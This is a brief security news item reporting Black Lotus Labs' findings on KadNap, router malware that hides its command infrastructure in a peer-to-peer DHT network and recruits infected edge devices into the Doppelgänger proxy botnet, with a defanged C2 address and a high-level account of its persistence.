KADNAP is a newly identified malware that has infected more than 14,000 edge devices, with the majority of victims located in the United States, according to Black Lotus Labs at Lumen. Although it primarily targets Asus routers, researchers say the operators have deployed KadNap against a range of edge networking devices.
The malware uses a custom Kademlia Distributed Hash Table to conceal its infrastructure within a peer‑to‑peer network, making it harder to detect or disrupt, and compromised devices are recruited into a proxy botnet service called Doppelgänger, which also markets resident proxies in over 50 countries. A shell script downloaded from the C2 server (212.104.141[.]140) initiates persistence by creating a cron job, renaming components, and loading an ELF file to deploy KadNap on devices with ARM and MIPS processors.
The operation also retrieves C2 IP addresses, closes SSH port 22, and stores host time data to help locate other peers. According to the report, KadNap’s use of the DHT network aims to conceal communications and hinder takedowns.